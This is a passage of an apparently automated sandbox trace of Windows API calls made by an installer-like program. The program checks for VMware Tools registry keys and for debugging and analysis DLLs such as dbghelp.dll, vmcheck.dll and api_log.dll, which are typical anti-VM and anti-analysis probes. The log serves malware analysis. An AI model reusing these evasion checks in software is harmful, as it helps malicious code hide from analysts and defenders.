returned="0" [0157.947] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.947] lstrlenA (lpString="0") returned 1 [0157.947] lstrcpynA (in: lpString1=0x40ac18, lpString2="SOFTWARE\\VMware, Inc.\\VMware Tools", iMaxLength=1024 | out: lpString1="SOFTWARE\\VMware, Inc.\\VMware Tools") returned="SOFTWARE\\VMware, Inc.\\VMware Tools" [0157.947] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\VMware, Inc.\\VMware Tools", ulOptions=0x0, samDesired=0x20119, phkResult=0x18f7f0 | out: 
phkResult=0x18f7f0*=0x0) returned 0x2 [0157.947] lstrcpynA (in: lpString1=0x40b018, lpString2="InstallPath", iMaxLength=1024 | out: lpString1="InstallPath") returned="InstallPath" [0157.948] lstrcpynA (in: lpString1=0x40a418, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.948] lstrlenA (lpString="0") returned 1 [0157.948] lstrcpynA (in: lpString1=0x432c00, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.948] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.948] lstrlenA (lpString="0") returned 1 [0157.948] lstrcpynA (in: lpString1=0x40ac18, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.948] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.948] lstrcmpiA (lpString1="0", lpString2="0") returned 0 [0157.948] lstrcpynA (in: lpString1=0x40a418, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.948] lstrlenA (lpString="FALSE") returned 5 [0157.948] lstrcpynA (in: lpString1=0x432800, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.948] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.948] lstrcpynA (in: lpString1=0x42e3a0, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.948] lstrlenA (lpString="FALSE") returned 5 [0157.948] lstrcpynA (in: lpString1=0x40ac18, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.948] lstrcpynA (in: lpString1=0x40b018, lpString2="TRUE", iMaxLength=1024 | out: lpString1="TRUE") returned="TRUE" [0157.948] lstrcmpiA (lpString1="FALSE", lpString2="TRUE") returned -1 [0157.948] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.948] lstrlenA (lpString="") returned 0 [0157.948] lstrcpynA (in: lpString1=0x31400c, 
lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.948] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.948] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.948] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.948] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.948] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.948] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.948] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.948] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.948] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.948] GetFileAttributesA 
(lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.949] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.949] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetModuleHandle(t 'dbghelp.dll') i.R0", iMaxLength=1024 | out: lpString1="kernel32::GetModuleHandle(t 'dbghelp.dll') i.R0") returned="kernel32::GetModuleHandle(t 'dbghelp.dll') i.R0" [0157.949] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.949] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.949] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.949] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.949] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.949] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.949] lstrcpyA (in: lpString1=0x3217a0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.949] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: 
lpString1="kernel32") returned="kernel32" [0157.949] lstrcpyA (in: lpString1=0x321fb0, lpString2="GetModuleHandle" | out: lpString1="GetModuleHandle") returned="GetModuleHandle" [0157.949] lstrcpynA (in: lpString1=0x323058, lpString2="dbghelp.dll", iMaxLength=1024 | out: lpString1="dbghelp.dll") returned="dbghelp.dll" [0157.950] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.950] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandle") returned 0x0 [0157.950] lstrlenA (lpString="GetModuleHandle") returned 15 [0157.950] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandleA") returned 0x75ca1245 [0157.950] lstrcpynA (in: lpString1=0x3217a0, lpString2="dbghelp.dll", iMaxLength=1024 | out: lpString1="dbghelp.dll") returned="dbghelp.dll" [0157.950] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.950] GetModuleHandleA (lpModuleName="dbghelp.dll") returned 0x0 [0157.950] lstrcpynA (in: lpString1=0x314418, lpString2="dbghelp.dll", iMaxLength=1024 | out: lpString1="dbghelp.dll") returned="dbghelp.dll" [0157.950] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="0") returned 1 [0157.950] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.950] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.950] lstrlenA (lpString="0") returned 1 [0157.950] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.950] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.950] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.950] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.950] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.950] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.950] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.951] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.951] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.951] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.951] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.951] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetModuleHandle(t 
'pstorec.dll') i.R0", iMaxLength=1024 | out: lpString1="kernel32::GetModuleHandle(t 'pstorec.dll') i.R0") returned="kernel32::GetModuleHandle(t 'pstorec.dll') i.R0" [0157.951] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.951] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.951] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.951] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.951] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.951] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.951] lstrcpyA (in: lpString1=0x3217a0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.951] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.951] lstrcpyA (in: lpString1=0x321fb0, lpString2="GetModuleHandle" | out: lpString1="GetModuleHandle") returned="GetModuleHandle" [0157.951] lstrcpynA (in: lpString1=0x323058, lpString2="pstorec.dll", iMaxLength=1024 | out: lpString1="pstorec.dll") returned="pstorec.dll" [0157.952] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.952] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandle") returned 0x0 [0157.952] lstrlenA (lpString="GetModuleHandle") returned 15 [0157.952] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandleA") 
returned 0x75ca1245 [0157.952] lstrcpynA (in: lpString1=0x3217a0, lpString2="pstorec.dll", iMaxLength=1024 | out: lpString1="pstorec.dll") returned="pstorec.dll" [0157.952] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.952] GetModuleHandleA (lpModuleName="pstorec.dll") returned 0x0 [0157.952] lstrcpynA (in: lpString1=0x314418, lpString2="pstorec.dll", iMaxLength=1024 | out: lpString1="pstorec.dll") returned="pstorec.dll" [0157.952] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="0") returned 1 [0157.952] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.952] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.952] lstrlenA (lpString="0") returned 1 [0157.952] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.952] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.952] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.952] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.952] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.952] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.953] lstrlenA 
(lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.953] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.953] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.953] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.953] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.953] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetModuleHandle(t 'vmcheck.dll') i.R0", iMaxLength=1024 | out: lpString1="kernel32::GetModuleHandle(t 'vmcheck.dll') i.R0") returned="kernel32::GetModuleHandle(t 'vmcheck.dll') i.R0" [0157.953] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.953] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.953] lstrcpynA (in: lpString1=0x40a818, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.953] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.953] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.953] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.953] lstrcpyA (in: lpString1=0x3217a0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.953] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.953] lstrcpyA (in: lpString1=0x321fb0, lpString2="GetModuleHandle" | out: lpString1="GetModuleHandle") returned="GetModuleHandle" [0157.953] lstrcpynA (in: lpString1=0x323058, lpString2="vmcheck.dll", iMaxLength=1024 | out: lpString1="vmcheck.dll") returned="vmcheck.dll" [0157.954] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.954] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandle") returned 0x0 [0157.954] lstrlenA (lpString="GetModuleHandle") returned 15 [0157.954] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandleA") returned 0x75ca1245 [0157.954] lstrcpynA (in: lpString1=0x3217a0, lpString2="vmcheck.dll", iMaxLength=1024 | out: lpString1="vmcheck.dll") returned="vmcheck.dll" [0157.954] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.954] GetModuleHandleA (lpModuleName="vmcheck.dll") returned 0x0 [0157.954] lstrcpynA (in: lpString1=0x314418, lpString2="vmcheck.dll", iMaxLength=1024 | out: lpString1="vmcheck.dll") returned="vmcheck.dll" [0157.954] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="0") returned 1 [0157.954] 
lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.954] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.954] lstrlenA (lpString="0") returned 1 [0157.954] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.954] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.954] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.954] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.954] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.954] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.954] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.955] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.955] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.955] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.955] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.955] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetModuleHandle(t 'api_log.dll') i.R0", iMaxLength=1024 | out: lpString1="kernel32::GetModuleHandle(t 'api_log.dll') i.R0") returned="kernel32::GetModuleHandle(t 'api_log.dll') i.R0" [0157.955] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.955] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.955] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.955] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.955] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.955] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df 
[0157.955] lstrcpyA (in: lpString1=0x3217a0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.955] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.955] lstrcpyA (in: lpString1=0x321fb0, lpString2="GetModuleHandle" | out: lpString1="GetModuleHandle") returned="GetModuleHandle" [0157.955] lstrcpynA (in: lpString1=0x323058, lpString2="api_log.dll", iMaxLength=1024 | out: lpString1="api_log.dll") returned="api_log.dll" [0157.956] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.956] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandle") returned 0x0 [0157.956] lstrlenA (lpString="GetModuleHandle") returned 15 [0157.956] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandleA") returned 0x75ca1245 [0157.956] lstrcpynA (in: lpString1=0x3217a0, lpString2="api_log.dll", iMaxLength=1024 | out: lpString1="api_log.dll") returned="api_log.dll" [0157.956] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.956] GetModuleHandleA (lpModuleName="api_log.dll") returned 0x0 [0157.956] lstrcpynA (in: lpString1=0x314418, lpString2="api_log.dll", iMaxLength=1024 | out: lpString1="api_log.dll") returned="api_log.dll" [0157.956] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="0") returned 1 [0157.956] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.956] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.956] lstrlenA (lpString="0") returned 1 [0157.956] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.956] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") 
returned 48 [0157.956] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.956] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.956] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.956] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.956] lstrlenA 